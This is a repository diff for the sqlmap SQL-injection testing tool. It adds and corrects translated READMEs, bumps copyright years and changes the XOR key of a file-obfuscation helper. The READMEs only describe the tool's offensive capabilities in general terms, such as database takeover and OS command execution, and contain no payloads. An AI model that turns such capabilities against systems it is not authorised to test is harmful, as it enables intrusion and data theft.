sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen.
|
||||
|
||||
Screenshots
|
||||
----
|
||||
|
||||
|
||||
|
||||
Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki.
|
||||
|
||||
Installatie
|
||||
----
|
||||
|
||||
Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken.
|
||||
|
||||
Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.6**, **2.7** en **3.x**.
|
||||
|
||||
Gebruik
|
||||
----
|
||||
|
||||
Om een lijst van basisopties en switches te krijgen gebruik:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Om een lijst van alle opties en switches te krijgen gebruik:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden.
|
||||
Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen.
|
||||
|
||||
Links
|
||||
----
|
||||
|
||||
* Homepage: https://sqlmap.org
|
||||
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -1,20 +1,20 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
||||
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalających na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
||||
|
||||
Zrzuty ekranowe
|
||||
----
|
||||
|
||||
|
||||
|
||||
Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości.
|
||||
Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrującą na wiki niektóre możliwości.
|
||||
|
||||
Instalacja
|
||||
----
|
||||
|
||||
Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
Najnowsze tarball archiwum jest dostępne po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
@@ -33,8 +33,8 @@ Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601).
|
||||
Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
Przykładowy wynik działania dostępny jest [tutaj](https://asciinema.org/a/46601).
|
||||
Aby uzyskać listę wszystkich dostępnych funkcji, parametrów i opisów ich działania wraz z przykładami użycia sqlmap proponujemy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Odnośniki
|
||||
----
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. "out-of-band" veza.
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение.
|
||||
|
||||
50
doc/translations/README-sk-SK.md
Normal file
50
doc/translations/README-sk-SK.md
Normal file
@@ -0,0 +1,50 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
|
||||
|
||||
Snímky obrazovky
|
||||
----
|
||||
|
||||
|
||||
|
||||
Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
|
||||
|
||||
Inštalácia
|
||||
----
|
||||
|
||||
Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
|
||||
|
||||
Využitie
|
||||
----
|
||||
|
||||
Na získanie zoznamu základných možností a prepínačov, použite:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Na získanie zoznamu všetkých možností a prepínačov, použite:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
|
||||
Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Linky
|
||||
----
|
||||
|
||||
* Domovská stránka: https://sqlmap.org
|
||||
* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
|
||||
|
||||
@@ -11,7 +11,7 @@ Ekran görüntüleri
|
||||
|
||||
|
||||
|
||||
İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
|
||||
İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
|
||||
|
||||
|
||||
Kurulum
|
||||
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||
sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||
|
||||
Kullanım
|
||||
----
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання.
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap là một công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tự động hóa quá trình phát hiện, khai thác lỗ hổng tiêm SQL và tiếp quản các máy chủ cơ sở dữ liệu. Nó đi kèm với
|
||||
một hệ thống phát hiện mạnh mẽ, nhiều tính năng thích hợp cho người kiểm tra thâm nhập (pentester) và một loạt các tùy chọn bao gồm phát hiện cơ sở dữ liệu, truy xuất dữ liệu từ cơ sở dữ liệu, truy cập tệp của hệ thống và thực hiện các lệnh trên hệ điều hành từ xa.
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# sqlmap
|
||||
# sqlmap 
|
||||
|
||||
[](https://travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://badge.fury.io/py/sqlmap) [](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [](https://twitter.com/sqlmap)
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过带外数据连接的方式执行操作系统命令。
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
"""
|
||||
beep.py - Make a beep sound
|
||||
|
||||
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
"""
|
||||
cloak.py - Simple file encryption/compression utility
|
||||
|
||||
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
|
||||
xrange = range
|
||||
ord = lambda _: _
|
||||
|
||||
KEY = b"ENWsCymUeJcXqSbD"
|
||||
KEY = b"E6wRbVhD0IBeCiGJ"
|
||||
|
||||
def xor(message, key):
|
||||
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
"""
|
||||
dbgtool.py - Portable executable to ASCII debug script converter
|
||||
|
||||
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,6 +1,6 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
|
||||
# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
||||
# See the file 'LICENSE' for copying permission
|
||||
|
||||
# Removes trailing spaces from blank lines inside project files
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user